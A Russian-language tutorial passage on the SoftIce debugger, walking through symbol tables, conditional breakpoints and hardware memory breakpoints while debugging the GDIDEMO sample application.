Результатом выполнения данной команды является информация о каждом зарегистрированном классе окна. Информация включает в себя: имя класса, адрес внутренней структуры данных WNDCLASS, модуль который зарегистрировал данный класс, адрес процедуры, которая обслуживает данный класс и состояние флагов стиля класса. Для получения подробной информации воспользуйтесь ключом –X.
Handle
Class Name
Owner
WndwProc
Styles

5110
BOUNCEDEMO
GDIDEMO
2E9F:00000114
03000003

40AC
DRAWDEMO
GDIDEMO
2E9F:000000FE
03000003

409C
MAZEDEMO
GDIDEMO
2E9F:000000E8
03000003

3BC4
XFORMDEMO
GDIDEMO
2E9F:000000D2
03000003

3BB4
POLYDEMO
GDIDEMO
2E9F:000000BC
03000003

3A00
GDIDEMO
GDIDEMO
2E9F:000000A6
03000003

7. Символьные имена.
Когда вы загружаете приложение с отладочной информацией, SoftIce автоматически создает таблицу символьных имен которая содержит все имена, определенные в данном приложении. Используя команду TABLE можно посмотреть какие таблицы символьных имен загружены в настоящий момент:
:TABLE
GDIDEMO [NM32]
0001044741 Bytes Of Symbol Memory Available
Используемая в данный момент таблица символьных имен выделена цветом. Если текущая таблица символьных имен не соответствует той на которую ссылается ваше приложение, то используя команду TABLE с именем вашего приложения в качестве аргумента, вы подключите нужную таблицу (если для вашего приложения создана таблица):
:TABLE GDIDEMO
Используя команду SYM вы можете посмотреть все символьные имена, определенные в текущей таблице (на экран выводятся по сегментам, внутри них в алфавитном порядке). Если интересует какие-то определенные имена, то используйте шаблоны:
:SYM w*
.text
(0137:00401000
, 000145C1 bytes)

0137:004012E0
WinMain

0137:00405700
WinMainCRTStartup

0137:004013AD
WndProc

0137:0040AF50
wcslen

0137:0040C160
wcsncnt

0137:004107A0
wctomb

0137:0040FA50
write_char

0137:0040FAD0
write_multi_char

0137:0040FB20
write_string

На экране список всех символьных имен, начинающихся с буквы w, все они расположены в сегменте .text (выполняемый сегмент, он начинается с адреса 0137:00401000 и имеет длину 0145C1H байт), т.е. эти имена – имена функций и процедур входящие в приложение GDIDEMO. Данные находятся в сегментах .data, .rdata, .idata.
8. Условные точки останова.
Одним из символов, определенных в приложении GDIDEMO, является функция LockWindowInfo. Назначение этой функции – возвращение адреса переменных, которые определяют свойства окна. Для того, чтобы ознакомиться с условными точками останова и точками останова на доступ к памяти, мы выполним следующие действий:
Установим точку останова на функцию LockWindowInfo
Отредактируем поставленную точку останова таким образом, чтобы она срабатывала по определенному нами условию.
Установим точку останова на доступ к ячейки памяти, для того чтобы отследить обращения к этой ячейке.
Установка точки останова на функцию LockWindowInfo.
Командой BPX LockWindowInfo поставим точку останова на выполнение на эту функцию. Каждый раз, когда в одном из окон приложения GDIDEMO нужно будет обновить информацию, программой будет вызываться функция LockWindowInfo, так как на эту функцию поставлена точка останова, то будет вызываться SoftIce. Командой BL проверьте, установилась ли точка останова. Запустите приложение командой X или G. Как только будет вызвана функция LockWindowInfo, SoftIce всплывет. Так как обновление происходит постоянно, то постоянно вызывается и SoftIce, что очень неудобно, если нас интересует обновление какого-либо конкретного окна. Чтобы перехватить вызов на обновление конкретного окна, к примеру, POLYDEMO, воспользуемся условной точкой останова. Из исходного текста программы (файл wininfo.c) видно, что функция LockWindowInfo получает в качестве входного аргумента один параметр HWND (Handle Window) – дескриптор окна, и возвращает в вызывающую функцию одно значение – указатель на переменные для данного окна. То есть если бы мы заставили срабатывать точку останова только на обработчик окна POLYDEMO, мы бы добились своей цели. Для начала нам необходимо узнать дескриптор нашего окна, для этого воспользуемся командой:
:HWND GDIDEMO
WindowHandle
hQueue
SZ
Qowner
ClassName
WindowProcedure

0724(1)
10FF
32
GDIDEMO
GDIDEMO
365F:000001C4

0728(2)
10FF
32
GDIDEMO
MdiClient
17A7:00001988

0734(3)
10FF
32
GDIDEMO
BOUNCEDEMO
365F:00000232

0730(3)
10FF
32
GDIDEMO
POLYDEMO
365F:000001DA

072C(3)
10FF
32
GDIDEMO
DRAWDEMO
365F:0000021c

дескриптор окна POLYDEMO имеет значение 0730, если в списке вы не увидели нужного окна, то запустите приложение клавишей X или G, опять сработает точка останова, проверьте, создалось ли окно, если нет, то повторите последние действия. Теперь можно останавливать исполнение программы только в том случае, когда в качестве параметра для функции LockWindowInfo используется значение 0730. В Windows параметры для функции обычно передаются через стек. При остановке в функции LockWindowInfo стек будет выглядеть следующим образом (посмотреть содержимое стека можно подведя курсор к регистру ESP, нажав правую кнопку мыши вызвать контекстное меню и выбрать команду Display, неплохо бы еще сменить командой DD формат вывода данных в DataWindow на показ двойных слов, так как наше приложение 32-разрядное):
ESP = 0055FC00
013F:0055FC00 00404852 00000730 0055FC3C 00008CAA
число 00404852 – это адрес, на который программа перейдет после завершения работы нашей функции (адрес возврата);
число 00000730 – это дескриптор окна POLYDEMO (собственно то, что нас интересует);
Теперь зная, где и что у нас передается в функцию, мы можем выставить условную точку останова. Для этого вызовем на редактирование точку останова, поставленную на функции LockWindowInfo:
:BPE 0
в нижней строке командного окна появиться строка:
:BPX LockWindowInfo
и курсор установиться в конце строки, теперь можете редактировать точку останова по своему усмотрению, в конце строки добавьте следующее условие: IF ESP->4 == 00000730 и нажмите Enter.
Точка останова теперь будет выглядеть так:
:BPX LockWindowInfo IF ESP->4 == 00000730
То есть она будет срабатывать тогда, когда двойное слово по адресу ESP+4 будет равным числу 00000730, которое соответствует дескриптору окна POLYDEMO. Проверьте командой BL, соответствует ли точка останова заданной, запускайте приложение и убедитесь, что вся эта конструкция замечательно работает.
Установим точку останова на доступ к первому двойному слову данных экземпляра окна POLYWINDOW. Как уже отмечалось выше, входным аргументом для функции LockWindowInfo является дескриптор окна, выходным адрес данных экземпляра окна. После срабатывания точки останова поставленной на функции LockWindowInfo с параметром соответствующим дескриптору окна POLYWINDOW, на выходе функции будем иметь адрес данных экземпляра окна POLYWINDOW, по этому адресу и поставим точку останова на доступ к памяти.
Для того чтобы получить адрес данных экземпляра окна, выполним программу до строки с номером 57 (в файле WININFO.C):
:G .57
функция возвращает 32-битное значение (в нашем случае адрес) в регистре EAX, поэтому можно используя команду BPMD (BreakPoint Memory Dword) и значение адреса в регистре EAX, поставить точку останова на доступ к первом слову данных экземляра окна POLYDEMO:
:BPMD EAX
Эта команда использует регистры аппаратной отладки встроенные в процессор для отслеживания чтения и записи двойного слова по указанному линейному адресу. В данном случае это первое слово данных экземпляра окна POLYDEMO. Используйте команду BL что бы проверить правильность установки точки останова.
:BL
00) BPX LOCKWINDOWINFO IF ((ESP->4)==0×00000730)
01) BPMD #015F:0052006C RW DR3
Точка останова с номером 0 установлена на исполнение функции LockWindowInfo и точка останова с номером 1 стоит на доступ к памяти по адресу #015F:0052006C.
Отключите 0 точку останова командой BD (Breakpoint Disable):
:BD 0
В отличие от команды BC, которая удаляет точку останова, команда BD временно отключает точку, т.е. она не будет срабатывать, но ее в любой момент можно включить обратно командой BE (Breakpoint Enable). Отключенные точки останова выделяются звездочками рядом с порядковым номером точки останова.
:BL
00) * BPX LOCKWINDOWINFO IF ((ESP->4)==0×00000730)
01) BPMD #015F:0052006C RW DR3
Запустите SoftIce командами X или G, когда окно POLYDEMO попытается получить доступ к первому двойному слову экземпляра данных окна, сработает точка останова и SoftIce всплывет, это будет происходить в функциях PolyRedraw и PolyDrawBez. Эти функции обращаются к полю nBezTotal, которое находиться по нулевому смещению в данных экземпляра окна POLYDEMO. Значение этого поля задает количество кривых одновременно выводимых в окно POLYDEMO.
Примечание: Из-за особенностей архитектуры процессоров Intel перехват обращения к ячейки памяти произойдет после исполнения команды обращающейся к памяти, т.е. SoftIce осановиться на следующей команде.
Сбросьте все точки останова командой BC * и выйдете из SoftIce.
Если вы добрались до этих строк – значит вы отладили свою первую программу с помощью замечательного отладчика SOFTICE. Но возможности SoftIce не ограничиваются теми, которые мы здесь вкратце рассмотрели, они гораздо больше.
Замеченные ошибки в версии 3.24:
При отладке программы в Code Window неправильно дизассемблируются команды перехода ( JXX SHORT), т.е. стрелочка показывает направление перехода правильно, а в мнемонике он на 100H больше (или меньше – не помню).
Автор выражает огромную благодарность всем тем, кто помогал в написании данного опуса : моей любимое девушке Наденьке; Эрнесту Полетаеву – за приведение в божеский вид того, что я написал и за подробные консультации; Михайлову Антону и Махонину Юре – за идею и возможность осуществления оной; Диме Петрасу – за то что он мой фидошный босс; и всем тем кого здесь нету :-))).